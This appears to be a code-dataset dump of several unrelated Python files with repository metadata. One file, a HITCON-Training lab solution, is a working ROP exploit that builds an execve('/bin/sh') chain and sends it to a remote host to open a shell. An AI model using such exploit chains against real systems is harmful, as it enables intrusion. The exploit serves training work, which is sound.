| 19.647059 | 60 | 0.724551 | 53 | 334 | 4.301887 | 0.509434 | 0.140351 | 0.210526 | 0.140351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029197 | 0.179641 | 334 | 16 | 61 | 20.875 | 0.80292 | 0 | 0 | 0 | 0 | 0 | 0.041916 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.333333 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
37c76b67f2a2e641db79f29db294b819d3490024 | 449 | py | Python | stubs/m5stack_flowui-1_4_0-beta/flowlib/lib/emoji.py | RonaldHiemstra/micropython-stubs | d97f879b01f6687baaebef1c7e26a80909c3cff3 | [
"MIT"
] | 38 | 2020-10-18T21:59:44.000Z | 2022-03-17T03:03:28.000Z | stubs/m5stack_flowui-1_4_0-beta/flowlib/lib/emoji.py | RonaldHiemstra/micropython-stubs | d97f879b01f6687baaebef1c7e26a80909c3cff3 | [
"MIT"
] | 176 | 2020-10-18T14:31:03.000Z | 2022-03-30T23:22:39.000Z | stubs/m5stack_flowui-1_4_0-beta/flowlib/lib/emoji.py | RonaldHiemstra/micropython-stubs | d97f879b01f6687baaebef1c7e26a80909c3cff3 | [
"MIT"
] | 6 | 2020-12-28T21:11:12.000Z | 2022-02-06T04:07:50.000Z | """
Module: 'flowlib.lib.emoji' on M5 FlowUI v1.4.0-beta
"""
# MCU: (sysname='esp32', nodename='esp32', release='1.11.0', version='v1.11-284-g5d8e1c867 on 2019-08-30', machine='ESP32 module with ESP32')
# Stubber: 1.3.1
class Emoji:
''
def clear():
pass
def draw_square():
pass
def show_love():
pass
def show_map():
pass
def show_normal():
pass
lcd = None
def sleep():
pass
| 16.035714 | 141 | 0.572383 | 64 | 449 | 3.953125 | 0.640625 | 0.110672 | 0.130435 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119266 | 0.271715 | 449 | 27 | 142 | 16.62963 | 0.654434 | 0.463252 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.4 | 0 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
8071919e1aa95195ef61c58834f2f2d4ada4535d | 258 | py | Python | examples/microblogging/init_db.py | half-cambodian-hacker-man/lustre | 93e2196a962cafcfd7fa0be93a6b0d563c46ba75 | [
"MIT"
] | 3 | 2020-09-06T02:21:09.000Z | 2020-09-30T00:05:54.000Z | examples/microblogging/init_db.py | videogame-hacker/lustre | 93e2196a962cafcfd7fa0be93a6b0d563c46ba75 | [
"MIT"
] | null | null | null | examples/microblogging/init_db.py | videogame-hacker/lustre | 93e2196a962cafcfd7fa0be93a6b0d563c46ba75 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from run_dev import random_secret_key
random_secret_key()
from microblogging import app, DATABASE_URL
from sqlalchemy import create_engine
if __name__ == "__main__":
app.db.metadata.create_all(create_engine(str(DATABASE_URL)))
| 21.5 | 64 | 0.802326 | 38 | 258 | 4.973684 | 0.657895 | 0.126984 | 0.15873 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004367 | 0.112403 | 258 | 11 | 65 | 23.454545 | 0.820961 | 0.081395 | 0 | 0 | 0 | 0 | 0.033898 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
8073b4266438788859aadc127c07d0e44167bfe7 | 408 | py | Python | spotify_dl/models.py | kaiulr/spotify1-dl | 3d2e3c33f2c697c4a936f8c0a89a04564bca0c74 | [
"MIT"
] | 1 | 2021-03-30T06:29:18.000Z | 2021-03-30T06:29:18.000Z | spotify_dl/models.py | tonyd33/spotify-dl | f453ad8e9ab3de45064045bfb8e7ae46434e31eb | [
"MIT"
] | null | null | null | spotify_dl/models.py | tonyd33/spotify-dl | f453ad8e9ab3de45064045bfb8e7ae46434e31eb | [
"MIT"
] | null | null | null | from peewee import SqliteDatabase
from peewee import Model, TextField
from os import path
from pathlib import Path
from spotify_dl.constants import SAVE_PATH
Path(path.expanduser(SAVE_PATH)).mkdir(exist_ok=True)
db = SqliteDatabase(path.expanduser(f"{SAVE_PATH}/songs.db"))
class Song(Model):
search_term = TextField()
video_id = TextField()
class Meta:
database = db
| 24 | 62 | 0.72549 | 55 | 408 | 5.254545 | 0.527273 | 0.083045 | 0.110727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.191176 | 408 | 16 | 63 | 25.5 | 0.875758 | 0 | 0 | 0 | 0 | 0 | 0.05102 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.416667 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
807ff9a0013174ce9485ba56d32cbc72ac6a8cdb | 601 | py | Python | examples/arith.py | pcanz/pPEGpy | f4dc1bb3bfc56feaba5add5b815adf4a2768b909 | [
"MIT"
] | null | null | null | examples/arith.py | pcanz/pPEGpy | f4dc1bb3bfc56feaba5add5b815adf4a2768b909 | [
"MIT"
] | null | null | null | examples/arith.py | pcanz/pPEGpy | f4dc1bb3bfc56feaba5add5b815adf4a2768b909 | [
"MIT"
] | null | null | null | import pPEG
print("Arith operator expression example....")
arith = pPEG.compile("""
exp = add
add = sub ('+' sub)*
sub = mul ('-' mul)*
mul = div ('*' div)*
div = pow ('/' pow)*
pow = val ('^' val)*
grp = '(' exp ')'
val = " " (sym / num / grp) " "
sym = [a-zA-Z]+
num = [0-9]+
""")
tests = [
    " 1 + 2 * 3 ",
    "x^2^3 - 1"
]
for test in tests:
p = arith.parse(test)
print(p)
# 1+2*3 ==> (+ 1 (* 2 3))
# ["add",[["num","1"],["mul",[["num","2"],["num","3"]]]]]
# x^2^3+1 ==> (+ (^ x 2 3) 1)
# ["add",[["pow",[["sym","x"],["num","2"],["num","3"]]],["num","1"]]]
| 18.212121 | 69 | 0.404326 | 90 | 601 | 2.7 | 0.366667 | 0.049383 | 0.049383 | 0.049383 | 0.041152 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057269 | 0.244592 | 601 | 32 | 70 | 18.78125 | 0.477974 | 0.291181 | 0 | 0 | 0 | 0 | 0.648456 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.047619 | 0.095238 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
808745cd6599b35823fa3a5f9fd93d09258ade85 | 1,519 | py | Python | Selenium_learning/04_ElementSendSmsTest.py | yeyuning1/AutoTT | 1ce88e9e73d71fa11d4d8ad12bd6741aa71f97d2 | [
"MIT"
] | null | null | null | Selenium_learning/04_ElementSendSmsTest.py | yeyuning1/AutoTT | 1ce88e9e73d71fa11d4d8ad12bd6741aa71f97d2 | [
"MIT"
] | 1 | 2021-06-02T00:24:41.000Z | 2021-06-02T00:24:41.000Z | Selenium_learning/04_ElementSendSmsTest.py | yeyuning1/AutoTT | 1ce88e9e73d71fa11d4d8ad12bd6741aa71f97d2 | [
"MIT"
] | null | null | null | from selenium import webdriver
from time import sleep
import unittest
class SendMsgCase(unittest.TestCase):
def setUp(self):
self.dr = webdriver.Chrome()
self.dr.get('https://h5.ele.me/login/#redirect=https%3A%2F%2Fwww.ele.me%2Fhome%2F')
self.dr.implicitly_wait(10)
    # Helper: locate an element by CSS selector
def by_css(self, css):
return self.dr.find_element_by_css_selector(css)
    # Locate the mobile phone number input box
def mobile_phone_input_box(self):
return self.by_css('[type = "tel"]')
    # Locate the "Get verification code for free" button
def send_msg_button(self):
return self.by_css('.CountButton-3e-kd')
    # Get the "verification code sent successfully" hint text
def send_msg_successful_text(self):
return self.by_css('#registerContainer > div > div.codeSendHint').text
    # Send the verification code
def send_msg(self, mobile_phone):
self.mobile_phone_input_box().send_keys(mobile_phone)
self.send_msg_button().click()
    # Test case
def test_send_msg_button(self):
        # Send the verification code
self.send_msg('178****5756')
sleep(2)
        # Verify the "Get verification code for free" button is disabled
self.assertFalse(self.send_msg_button().is_enabled())
        # Expected result
expected_result = '已发送'
        # Actual result
actual_result = self.send_msg_button().text
        # Verify the actual result contains the expected text '已发送'
self.assertTrue(expected_result in actual_result)
def test_login_with_smscode(self):
        # Connect to the Redis server to fetch the smscode, log in, and verify the returned status code
pass
def tearDown(self):
self.dr.quit()
if __name__ == '__main__':
unittest.main()
| 24.5 | 91 | 0.63792 | 194 | 1,519 | 4.737113 | 0.484536 | 0.060936 | 0.070729 | 0.052231 | 0.062024 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014925 | 0.250165 | 1,519 | 61 | 92 | 24.901639 | 0.791923 | 0.107966 | 0 | 0 | 0 | 0.03125 | 0.123134 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 1 | 0.28125 | false | 0.03125 | 0.09375 | 0.125 | 0.53125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
8098f59fb4f00fc445f8a807e5cbe4d479fa92bf | 863 | py | Python | HITCON-Training/LAB/lab5/simplerop.py | kernweak/HITCON-Training-writeup | cb9c7ca3dbb8bc22ad41bd94bf5b9f929823aa7c | [
"MIT"
] | 30 | 2017-09-05T14:29:30.000Z | 2022-03-20T01:51:29.000Z | HITCON-Training/LAB/lab5/simplerop.py | kernweak/HITCON-Training-writeup | cb9c7ca3dbb8bc22ad41bd94bf5b9f929823aa7c | [
"MIT"
] | null | null | null | HITCON-Training/LAB/lab5/simplerop.py | kernweak/HITCON-Training-writeup | cb9c7ca3dbb8bc22ad41bd94bf5b9f929823aa7c | [
"MIT"
] | 7 | 2018-03-15T10:07:43.000Z | 2020-12-14T09:36:19.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwnpwnpwn import *
from pwn import *
host = "10.211.55.28"
port = 8888
r = remote(host,port)
gadget = 0x809a15d # mov dword ptr [edx], eax ; ret
pop_eax_ret = 0x80bae06
pop_edx_ret = 0x806e82a
pop_edx_ecx_ebx = 0x0806e850
buf = 0x80ea060
int_80 = 0x80493e1
# write "/bin/sh\x00" into writable memory at buf
payload = "a"*32
payload += p32(pop_edx_ret)
payload += p32(buf)
payload += p32(pop_eax_ret)
payload += "/bin"
payload += p32(gadget)
payload += p32(pop_edx_ret)
payload += p32(buf+4)
payload += p32(pop_eax_ret)
payload += "/sh\x00"
payload += p32(gadget)
# set up registers for execve("/bin/sh", 0, 0): edx=0, ecx=0, ebx=buf, eax=0xb
payload += p32(pop_edx_ecx_ebx)
payload += p32(0)
payload += p32(0)
payload += p32(buf)
payload += p32(pop_eax_ret)
payload += p32(0xb)
payload += p32(int_80)
print(len(payload))
r.recvuntil(":")
r.sendline(payload)
r.interactive()
| 18.76087 | 51 | 0.70336 | 138 | 863 | 4.224638 | 0.42029 | 0.25729 | 0.133791 | 0.082333 | 0.303602 | 0.265866 | 0.221269 | 0.221269 | 0.133791 | 0 | 0 | 0.135501 | 0.144844 | 863 | 45 | 52 | 19.177778 | 0.654472 | 0.121669 | 0 | 0.323529 | 0 | 0 | 0.033201 | 0 | 0 | 0 | 0.090305 | 0 | 0 | 0 | null | null | 0 | 0.058824 | null | null | 0.029412 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
809fb67389f1a15a5e682873f0a520242ed9aef8 | 3,980 | py | Python | Credential-Adder-User-Input.py | Wason1/Cerner-Credential-Auto-Adder | fa42508661d352dbc6aea6858f6b8a54a7533184 | [
"MIT"
] | null | null | null | Credential-Adder-User-Input.py | Wason1/Cerner-Credential-Auto-Adder | fa42508661d352dbc6aea6858f6b8a54a7533184 | [
"MIT"
] | null | null | null | Credential-Adder-User-Input.py | Wason1/Cerner-Credential-Auto-Adder | fa42508661d352dbc6aea6858f6b8a54a7533184 | [
"MIT"
] | null | null | null | # This adds credentials to the pool for the credential box
# Asks user for year and users to add
start_day = 1
start_month = 1
#start_year = 1904
#users_to_add = 100
users_to_add = int(input('How many users do you want to add? '))
print('Be aware a user cannot have duplicate credentials with the same start date')
start_year = int(input('What year shall the creds start at (choose a year before 2018)? '))
# IMPORT LIBRARIES
import pyautogui
import time
import pygetwindow as gw
from ahk import AHK
ahk = AHK()
pyautogui.FAILSAFE = True
# Activate HNA User Window
try:
myWindow = gw.getWindowsWithTitle('User Maint')[0]
myWindow.activate()
myWindow.maximize()
except Exception:
    print('could not maximise User Maintenance window')
time.sleep(1)
# Switch Search Field to Username
ahk.key_press('F10')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('right')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('enter')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
# Open Credential Box
user = 'credentialbox'
pyautogui.typewrite(user, interval=0.1)
ahk.key_press('Enter')
# Select Credential Button
time.sleep(1)
ahk.key_press('f10')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('right')
time.sleep(0.1)
ahk.key_press('c')
time.sleep(1)
count = 0
while count < users_to_add:
# Click on create new credential
if count == 0:
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
else:
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
#Choose Credential
to_type = 'a'
pyautogui.typewrite(to_type, interval=0.1)
time.sleep(0.1)
# Go to type of licence
ahk.key_press('tab')
time.sleep(0.4)
# Choose Licence
ahk.key_press('l')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
# Enter date
    day = "{0:0=2d}".format(start_day)  # zero-pad day to two digits
    month = "{0:0=2d}".format(start_month)  # zero-pad month to two digits
    year = str(start_year)  # year as string
pyautogui.typewrite(day, interval=0.1)
pyautogui.typewrite(month, interval=0.1)
pyautogui.typewrite(year, interval=0.1)
    # Advance the date for the next credential
    start_day += 1
    if start_day > 25:
        start_day = 1
        start_month += 1
        if start_month > 12:
            start_day = 1
            start_month = 1
            start_year += 1
# Hit Apply
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('enter')
time.sleep(2)
# delete credential
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('space')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('enter')
# Apply deletion
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('enter')
time.sleep(1)
    count += 1
80c24487375fb8fc999bda53d3ebbccc9fadf09d | 411 | py | Python | mrpod/__init__.py | chuckedfromspace/mrpod | ed831ddb6c1c634767149630effec0e766b54e4a | [
"BSD-3-Clause"
] | 4 | 2020-12-06T17:03:21.000Z | 2021-05-26T22:07:59.000Z | mrpod/__init__.py | chuckedfromspace/mrpod | ed831ddb6c1c634767149630effec0e766b54e4a | [
"BSD-3-Clause"
] | null | null | null | mrpod/__init__.py | chuckedfromspace/mrpod | ed831ddb6c1c634767149630effec0e766b54e4a | [
"BSD-3-Clause"
] | null | null | null | """
MRPOD
"""
from __future__ import division, print_function, absolute_import
from .wavelet_transform import scale_to_frq, time_shift, CompositeFilter, WaveletTransform
from .modal_decomposition import (pod_eigendecomp, pod_modes, mrpod_eigendecomp,
mrpod_detail_bundle)
from .utils import pkl_dump, pkl_load
from ._version import __version__
__all__ = [s for s in dir()]
| 27.4 | 90 | 0.749392 | 50 | 411 | 5.62 | 0.68 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.187348 | 411 | 14 | 91 | 29.357143 | 0.841317 | 0.012165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.714286 | 0 | 0.714286 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |